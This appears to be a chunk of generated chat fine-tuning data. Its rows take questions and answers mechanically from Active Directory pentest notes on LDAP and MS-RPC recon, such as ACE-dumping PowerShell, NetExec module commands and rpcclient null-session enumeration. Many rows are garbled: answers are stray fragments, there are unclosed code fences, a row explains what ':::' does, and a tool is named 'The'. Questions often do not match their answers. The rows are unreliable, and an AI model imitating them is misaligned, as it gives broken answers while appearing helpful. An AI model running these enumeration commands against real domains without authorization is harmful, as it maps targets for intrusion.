'S-1-5-11', 'S-1-5-15', 'S-1-5-7', 'S-1-5-32-545', 'S-1-5-32-546')) }\n``\n\n:::\n\nNetExec (Python) also has useful modules that can be used to\n\n* map information regarding AD-CS (Active Directory Certificate Services)\n* show subnets listed in AD-SS (Active Directory Sites and Services)\n* list the users description\n* print the Machine Account Quota domain-level attribute's value\n\n``bash", "metadata": {"corpus_index": 1282, "category": "active_directory", "source_file": "docs/src/ad/recon/ldap.md", "page_title": "LDAP", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Dump all the inbound ACEs of user 'Kinda KU. USY' in the 'ADLAB.LOCAL' domain, then extract the permissive rights granted to non-default RIDs (i.e. above 1000), or permissive groups (e.g. 'Everyone' with SID 'S-1-1-0')"}, {"role": "assistant", "content": "$DumpInboundACLs = Invoke-PassTheCert -Action 'GetInboundACEs' -LdapConnection $LdapConnection -Object 'CN=Kinda KU. USY,CN=Users,DC=ADLAB,DC=LOCAL'\n$DumpInboundACLs |?{ $_.AceQualifier -eq 'AccessAllowed' -and ($_.AccessMaskNames -ilike 'GenericAll' -or $_.AccessMaskNames -ilike 'GenericWrite' -or $_.AccessMaskNames -ilike 'WriteProperty' -or $_.AccessMaskNames -ilike 'WriteDACL') -and ($_.SecurityIdentifier -match 'S-1-5-21-(\\d+-){3}\\d{4,}' -or $_.SecurityIdentifier -match 'S-1-5-21-(\\d+-){3}513' -or $_.SecurityIdentifier -match 'S-1-5-21-(\\d+-){3}515' -or $_.SecurityIdentifier -in @('S-1-1-0', 'S-1-5-11', 'S-1-5-15', 'S-1-5-7', 'S-1-5-32-545', 'S-1-5-32-546')) }\n``\n\n:::\n\nNetExec (Python) also has useful modules that can be used to\n\n* map information regarding AD-CS (Active Directory Certificate Services)\n* show subnets listed in AD-SS (Active Directory Sites and Services)\n* list the users description\n* print the Machine Account Quota domain-level attribute's value\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Dump all the inbound ACEs of user 'Kinda KU. USY' in the 'ADLAB.LOCAL' domain, then extract the permissive rights granted to non-default RIDs (i.e. above 1000), or permissive groups (e.g. 'Everyone' with SID 'S-1-1-0')", "response": "$DumpInboundACLs = Invoke-PassTheCert -Action 'GetInboundACEs' -LdapConnection $LdapConnection -Object 'CN=Kinda KU. USY,CN=Users,DC=ADLAB,DC=LOCAL'\n$DumpInboundACLs |?{ $_.AceQualifier -eq 'AccessAllowed' -and ($_.AccessMaskNames -ilike 'GenericAll' -or $_.AccessMaskNames -ilike 'GenericWrite' -or $_.AccessMaskNames -ilike 'WriteProperty' -or $_.AccessMaskNames -ilike 'WriteDACL') -and ($_.SecurityIdentifier -match 'S-1-5-21-(\\d+-){3}\\d{4,}' -or $_.SecurityIdentifier -match 'S-1-5-21-(\\d+-){3}513' -or $_.SecurityIdentifier -match 'S-1-5-21-(\\d+-){3}515' -or $_.SecurityIdentifier -in @('S-1-1-0', 'S-1-5-11', 'S-1-5-15', 'S-1-5-7', 'S-1-5-32-545', 'S-1-5-32-546')) }\n``\n\n:::\n\nNetExec (Python) also has useful modules that can be used to\n\n* map information regarding AD-CS (Active Directory Certificate Services)\n* show subnets listed in AD-SS (Active Directory Sites and Services)\n* list the users description\n* print the Machine Account Quota domain-level attribute's value\n\n``bash", "metadata": {"corpus_index": 1282, "category": "active_directory", "source_file": "docs/src/ad/recon/ldap.md", "page_title": "LDAP", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Dump all the inbound ACEs of user 'Kinda KU. USY' in the 'ADLAB.LOCAL' domain, then extract the permissive rights granted to non-default RIDs (i.e. above 1000), or permissive groups (e.g. 'Everyone' with SID 'S-1-1-0')?"}, {"role": "assistant", "content": ":::\n\n\n[NetExec](https://github.com/Pennyw0rth/NetExec) (Python) also has useful modules that can be used to\n\n* map information regarding [AD-CS (Active Directory Certificate Services)](../movement/adcs/)\n* show subnets listed in AD-SS (Active Directory Sites and Services)\n* list the users description\n* print the [Machine Account Quota](../movement/builtins/machineaccountquota.md) domain-level attribute's value"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Dump all the inbound ACEs of user 'Kinda KU. USY' in the 'ADLAB.LOCAL' domain, then extract the permissive rights granted to non-default RIDs (i.e. above 1000), or permissive groups (e.g. 'Everyone' with SID 'S-1-1-0')?", "response": ":::\n\n\n[NetExec](https://github.com/Pennyw0rth/NetExec) (Python) also has useful modules that can be used to\n\n* map information regarding [AD-CS (Active Directory Certificate Services)](../movement/adcs/)\n* show subnets listed in AD-SS (Active Directory Sites and Services)\n* list the users description\n* print the [Machine Account Quota](../movement/builtins/machineaccountquota.md) domain-level attribute's value", "metadata": {"corpus_index": 1283, "category": "active_directory", "source_file": "docs/src/ad/recon/ldap.md", "page_title": "LDAP", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `:::`?"}, {"role": "assistant", "content": "This command is used for dump all the inbound aces of user 'kinda ku. usy' in the 'adlab.local' domain, then extract the permissive rights granted to non-default rids (i.e. above 1000), or permissive groups (e.g. 'everyone' with sid 's-1-1-0'). Dump all the inbound ACEs of user 'Kinda KU. USY' in the 'ADLAB.LOCAL' domain, then extract the permissive rights granted to non-default RIDs (i.e. above 1000), or permissive groups (e.g. 'Everyone' with SID 'S-1-1-0')"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `:::`?", "response": "This command is used for dump all the inbound aces of user 'kinda ku. usy' in the 'adlab.local' domain, then extract the permissive rights granted to non-default rids (i.e. above 1000), or permissive groups (e.g. 'everyone' with sid 's-1-1-0'). Dump all the inbound ACEs of user 'Kinda KU. USY' in the 'ADLAB.LOCAL' domain, then extract the permissive rights granted to non-default RIDs (i.e. above 1000), or permissive groups (e.g. 'Everyone' with SID 'S-1-1-0')", "metadata": {"corpus_index": 1283, "category": "active_directory", "source_file": "docs/src/ad/recon/ldap.md", "page_title": "LDAP", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does list PKIs/CAs work?"}, {"role": "assistant", "content": "nxc ldap \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" -M adcs"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does list PKIs/CAs work?", "response": "nxc ldap \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" -M adcs", "metadata": {"corpus_index": 1284, "category": "active_directory", "source_file": "docs/src/ad/recon/ldap.md", "page_title": "LDAP", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for list PKIs/CAs"}, {"role": "assistant", "content": "nxc ldap \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" -M adcs"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for list PKIs/CAs", "response": "nxc ldap \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" -M adcs", "metadata": {"corpus_index": 1284, "category": "active_directory", "source_file": "docs/src/ad/recon/ldap.md", "page_title": "LDAP", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about list subnets referenced in AD-SS"}, {"role": "assistant", "content": "nxc ldap \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" -M subnets"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about list subnets referenced in AD-SS", "response": "nxc ldap \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" -M subnets", "metadata": {"corpus_index": 1285, "category": "active_directory", "source_file": "docs/src/ad/recon/ldap.md", "page_title": "LDAP", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform list subnets referenced in AD-SS?"}, {"role": "assistant", "content": "nxc ldap \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" -M subnets"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform list subnets referenced in AD-SS?", "response": "nxc ldap \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" -M subnets", "metadata": {"corpus_index": 1285, "category": "active_directory", "source_file": "docs/src/ad/recon/ldap.md", "page_title": "LDAP", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about machine account quota?"}, {"role": "assistant", "content": "nxc ldap \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" -M maq"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about machine account quota?", "response": "nxc ldap \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" -M maq", "metadata": {"corpus_index": 1286, "category": "active_directory", "source_file": "docs/src/ad/recon/ldap.md", "page_title": "LDAP", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute machine account quota?"}, {"role": "assistant", "content": "nxc ldap \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" -M maq"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute machine account quota?", "response": "nxc ldap \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" -M maq", "metadata": {"corpus_index": 1286, "category": "active_directory", "source_file": "docs/src/ad/recon/ldap.md", "page_title": "LDAP", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe users description in the context of penetration testing"}, {"role": "assistant", "content": "nxc ldap \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" -M get-desc-users\n``\n\nThe PowerShell equivalent to netexec's subnets modules is the following\n\n`powershell\n[System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest().Sites.Subnets\n``\n\n> [!TIP]\n> LDAP anonymous binding is usually disabled but it's worth checking. It could be handy to list the users and test for ASREProasting (since this attack needs no authentication).\n\n> [!SUCCESS]\n> Automation and scripting\n> \n> * A more advanced LDAP enumeration can be carried out with BloodHound (see this).\n> * The enum4linux tool can also be used, among other things, for LDAP recon (see this)."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe users description in the context of penetration testing", "response": "nxc ldap \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" -M get-desc-users\n``\n\nThe PowerShell equivalent to netexec's subnets modules is the following\n\n`powershell\n[System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest().Sites.Subnets\n``\n\n> [!TIP]\n> LDAP anonymous binding is usually disabled but it's worth checking. It could be handy to list the users and test for ASREProasting (since this attack needs no authentication).\n\n> [!SUCCESS]\n> Automation and scripting\n> \n> * A more advanced LDAP enumeration can be carried out with BloodHound (see this).\n> * The enum4linux tool can also be used, among other things, for LDAP recon (see this).", "metadata": {"corpus_index": 1287, "category": "active_directory", "source_file": "docs/src/ad/recon/ldap.md", "page_title": "LDAP", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for users description?"}, {"role": "assistant", "content": "nxc ldap \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" -M get-desc-users\n``\n\nThe PowerShell equivalent to netexec's subnets modules is the following\n\n`powershell\n[System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest().Sites.Subnets\n``\n\n> [!TIP]\n> LDAP anonymous binding is usually disabled but it's worth checking. It could be handy to list the users and test for ASREProasting (since this attack needs no authentication).\n\n> [!SUCCESS]\n> Automation and scripting\n> \n> * A more advanced LDAP enumeration can be carried out with BloodHound (see this).\n> * The enum4linux tool can also be used, among other things, for LDAP recon (see this)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for users description?", "response": "nxc ldap \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" -M get-desc-users\n``\n\nThe PowerShell equivalent to netexec's subnets modules is the following\n\n`powershell\n[System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest().Sites.Subnets\n``\n\n> [!TIP]\n> LDAP anonymous binding is usually disabled but it's worth checking. It could be handy to list the users and test for ASREProasting (since this attack needs no authentication).\n\n> [!SUCCESS]\n> Automation and scripting\n> \n> * A more advanced LDAP enumeration can be carried out with BloodHound (see this).\n> * The enum4linux tool can also be used, among other things, for LDAP recon (see this).", "metadata": {"corpus_index": 1287, "category": "active_directory", "source_file": "docs/src/ad/recon/ldap.md", "page_title": "LDAP", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use The for users description?"}, {"role": "assistant", "content": "The PowerShell equivalent to netexec's `subnets` modules is the following"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use The for users description?", "response": "The PowerShell equivalent to netexec's `subnets` modules is the following", "metadata": {"corpus_index": 1288, "category": "active_directory", "source_file": "docs/src/ad/recon/ldap.md", "page_title": "LDAP", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "The"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do users description"}, {"role": "assistant", "content": "The PowerShell equivalent to netexec's `subnets` modules is the following"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do users description", "response": "The PowerShell equivalent to netexec's `subnets` modules is the following", "metadata": {"corpus_index": 1288, "category": "active_directory", "source_file": "docs/src/ad/recon/ldap.md", "page_title": "LDAP", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `The PowerShell equivalent to netexec's `subnets` modules is the following`?"}, {"role": "assistant", "content": "This command is used for users description. users description"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `The PowerShell equivalent to netexec's `subnets` modules is the following`?", "response": "This command is used for users description. users description", "metadata": {"corpus_index": 1288, "category": "active_directory", "source_file": "docs/src/ad/recon/ldap.md", "page_title": "LDAP", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about MS-RPC - Theory?"}, {"role": "assistant", "content": "MS-RPC (Microsoft Remote Procedure Call) is a protocol that allows requesting service from a program on another computer without having to understand the details of that computer's network. An MS-RPC service can be accessed through different transport protocols, among which:\n\n* a network SMB pipe (listening ports are 139 & 445)\n* plain TCP or plain UDP (listening port set at the service creation)\n* a local SMB pipe\n\nRPC services over an SMB transport, i.e. port 445/TCP, are reachable through \"named pipes\"' (through the IPC$ share). There are many interesting named pipes that allow various operations from NULL sessions context, to local administrative context.\n\n* \\pipe\\lsarpc: enumerate privileges, trust relationships, SIDs, policies and more through the LSA (Local Security Authority)\n* \\pipe\\samr: enumerate domain users, groups and more through the local SAM database (only works pre Win 10 Anniversary)\n* \\pipe\\svcctl: remotely create, start and stop services to execute commands (used by Impacket's psexec.py and smbexec.py)\n* \\pipe\\atsvc: remotely create scheduled tasks to execute commands (used by Impacket's atexec.py)\n* \\pipe\\epmapper: used by DCOM (Distributed Component Object Model), itself used by WMI (Windows Management Instrumentation), itself abused by attackers for command execution (used by Impacket's wmiexec.py). DCOM is also used by MMC (Microsoft Management Console), itslef abused by attackers for command execution (Impacket's dcomexec.py)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about MS-RPC - Theory?", "response": "MS-RPC (Microsoft Remote Procedure Call) is a protocol that allows requesting service from a program on another computer without having to understand the details of that computer's network. An MS-RPC service can be accessed through different transport protocols, among which:\n\n* a network SMB pipe (listening ports are 139 & 445)\n* plain TCP or plain UDP (listening port set at the service creation)\n* a local SMB pipe\n\nRPC services over an SMB transport, i.e. port 445/TCP, are reachable through \"named pipes\"' (through the IPC$ share). There are many interesting named pipes that allow various operations from NULL sessions context, to local administrative context.\n\n* \\pipe\\lsarpc: enumerate privileges, trust relationships, SIDs, policies and more through the LSA (Local Security Authority)\n* \\pipe\\samr: enumerate domain users, groups and more through the local SAM database (only works pre Win 10 Anniversary)\n* \\pipe\\svcctl: remotely create, start and stop services to execute commands (used by Impacket's psexec.py and smbexec.py)\n* \\pipe\\atsvc: remotely create scheduled tasks to execute commands (used by Impacket's atexec.py)\n* \\pipe\\epmapper: used by DCOM (Distributed Component Object Model), itself used by WMI (Windows Management Instrumentation), itself abused by attackers for command execution (used by Impacket's wmiexec.py). DCOM is also used by MMC (Microsoft Management Console), itslef abused by attackers for command execution (Impacket's dcomexec.py)", "metadata": {"corpus_index": 1289, "category": "network", "source_file": "docs/src/ad/recon/ms-rpc.md", "page_title": "MS-RPC", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on MS-RPC - Theory"}, {"role": "assistant", "content": "MS-RPC (Microsoft Remote Procedure Call) is a protocol that allows requesting service from a program on another computer without having to understand the details of that computer's network. An MS-RPC service can be accessed through different transport protocols, among which:\n\n* a network SMB pipe (listening ports are 139 & 445)\n* plain TCP or plain UDP (listening port set at the service creation)\n* a local SMB pipe\n\nRPC services over an SMB transport, i.e. port 445/TCP, are reachable through \"named pipes\"' (through the IPC$ share). There are many interesting named pipes that allow various operations from NULL sessions context, to local administrative context.\n\n* \\pipe\\lsarpc: enumerate privileges, trust relationships, SIDs, policies and more through the LSA (Local Security Authority)\n* \\pipe\\samr: enumerate domain users, groups and more through the local SAM database (only works pre Win 10 Anniversary)\n* \\pipe\\svcctl: remotely create, start and stop services to execute commands (used by Impacket's psexec.py and smbexec.py)\n* \\pipe\\atsvc: remotely create scheduled tasks to execute commands (used by Impacket's atexec.py)\n* \\pipe\\epmapper: used by DCOM (Distributed Component Object Model), itself used by WMI (Windows Management Instrumentation), itself abused by attackers for command execution (used by Impacket's wmiexec.py). DCOM is also used by MMC (Microsoft Management Console), itslef abused by attackers for command execution (Impacket's dcomexec.py)"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on MS-RPC - Theory", "response": "MS-RPC (Microsoft Remote Procedure Call) is a protocol that allows requesting service from a program on another computer without having to understand the details of that computer's network. An MS-RPC service can be accessed through different transport protocols, among which:\n\n* a network SMB pipe (listening ports are 139 & 445)\n* plain TCP or plain UDP (listening port set at the service creation)\n* a local SMB pipe\n\nRPC services over an SMB transport, i.e. port 445/TCP, are reachable through \"named pipes\"' (through the IPC$ share). There are many interesting named pipes that allow various operations from NULL sessions context, to local administrative context.\n\n* \\pipe\\lsarpc: enumerate privileges, trust relationships, SIDs, policies and more through the LSA (Local Security Authority)\n* \\pipe\\samr: enumerate domain users, groups and more through the local SAM database (only works pre Win 10 Anniversary)\n* \\pipe\\svcctl: remotely create, start and stop services to execute commands (used by Impacket's psexec.py and smbexec.py)\n* \\pipe\\atsvc: remotely create scheduled tasks to execute commands (used by Impacket's atexec.py)\n* \\pipe\\epmapper: used by DCOM (Distributed Component Object Model), itself used by WMI (Windows Management Instrumentation), itself abused by attackers for command execution (used by Impacket's wmiexec.py). DCOM is also used by MMC (Microsoft Management Console), itslef abused by attackers for command execution (Impacket's dcomexec.py)", "metadata": {"corpus_index": 1289, "category": "network", "source_file": "docs/src/ad/recon/ms-rpc.md", "page_title": "MS-RPC", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does MS-RPC - Find exposed services work?"}, {"role": "assistant", "content": "The epmapper (MS-RPC EndPoint Mapper) maps services to ports. It uses port 135/TCP and/or port 593/TCP (for RPC over HTTP). Through epmapper, tools like Impacket's rpcdump.py (Python) or rpcdump.exe (C) from rpctools can find exposed RPC services.\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does MS-RPC - Find exposed services work?", "response": "The epmapper (MS-RPC EndPoint Mapper) maps services to ports. It uses port 135/TCP and/or port 593/TCP (for RPC over HTTP). Through epmapper, tools like Impacket's rpcdump.py (Python) or rpcdump.exe (C) from rpctools can find exposed RPC services.\n\n```bash", "metadata": {"corpus_index": 1290, "category": "network", "source_file": "docs/src/ad/recon/ms-rpc.md", "page_title": "MS-RPC", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for MS-RPC - Find exposed services?"}, {"role": "assistant", "content": "The epmapper (MS-RPC EndPoint Mapper) maps services to ports. It uses port 135/TCP and/or port 593/TCP (for RPC over HTTP). Through epmapper, tools like Impacket's rpcdump.py (Python) or rpcdump.exe (C) from rpctools can find exposed RPC services.\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for MS-RPC - Find exposed services?", "response": "The epmapper (MS-RPC EndPoint Mapper) maps services to ports. It uses port 135/TCP and/or port 593/TCP (for RPC over HTTP). Through epmapper, tools like Impacket's rpcdump.py (Python) or rpcdump.exe (C) from rpctools can find exposed RPC services.\n\n```bash", "metadata": {"corpus_index": 1290, "category": "network", "source_file": "docs/src/ad/recon/ms-rpc.md", "page_title": "MS-RPC", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain MS-RPC - Null sessions"}, {"role": "assistant", "content": "NULL sessions are unauthenticated SMB sessions that allow attackers to operate RPC calls through SMB named pipes without being authenticated first. This allows for many recon techniques like the enumeration of domain and local information (users, groups, RIDs, SIDs, policies, etc.)."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain MS-RPC - Null sessions", "response": "NULL sessions are unauthenticated SMB sessions that allow attackers to operate RPC calls through SMB named pipes without being authenticated first. This allows for many recon techniques like the enumeration of domain and local information (users, groups, RIDs, SIDs, policies, etc.).", "metadata": {"corpus_index": 1291, "category": "network", "source_file": "docs/src/ad/recon/ms-rpc.md", "page_title": "MS-RPC", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for MS-RPC - Null sessions"}, {"role": "assistant", "content": "NULL sessions are unauthenticated SMB sessions that allow attackers to operate RPC calls through SMB named pipes without being authenticated first. This allows for many recon techniques like the enumeration of domain and local information (users, groups, RIDs, SIDs, policies, etc.)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for MS-RPC - Null sessions", "response": "NULL sessions are unauthenticated SMB sessions that allow attackers to operate RPC calls through SMB named pipes without being authenticated first. This allows for many recon techniques like the enumeration of domain and local information (users, groups, RIDs, SIDs, policies, etc.).", "metadata": {"corpus_index": 1291, "category": "network", "source_file": "docs/src/ad/recon/ms-rpc.md", "page_title": "MS-RPC", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain MS-RPC - Recon through interesting named pipes"}, {"role": "assistant", "content": "The Samba utility named rpcclient can be used to operate recon through MS-RPC services behind SMB named pipes. It offers multiple useful commands.\n\n* lsaquery: get domain name and SID (Security IDentifier)\n* enumalsgroups builtin: list local groups, returns RIDs (Relative IDs)\n* queryaliasmem : list local group members, returns SIDs\n* lookupsids : resolve SID to name\n* lookupnames : resolve name to SID\n* enumdomusers: list users, equivalent to net user /domain\n* enumdomgroups: list groups equivalent to net group /domain\n* queryuser : obtain info on a user, equivalent to net user /domain\n* querygroupmem : obtain group members, equivalent to net group /domain\n* getdompwinfo: get password policy\n\n``bash\nrpcclient -c \"command\" -U \"\" -N \"$TARGET\"\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain MS-RPC - Recon through interesting named pipes", "response": "The Samba utility named rpcclient can be used to operate recon through MS-RPC services behind SMB named pipes. It offers multiple useful commands.\n\n* lsaquery: get domain name and SID (Security IDentifier)\n* enumalsgroups builtin: list local groups, returns RIDs (Relative IDs)\n* queryaliasmem : list local group members, returns SIDs\n* lookupsids : resolve SID to name\n* lookupnames : resolve name to SID\n* enumdomusers: list users, equivalent to net user /domain\n* enumdomgroups: list groups equivalent to net group /domain\n* queryuser : 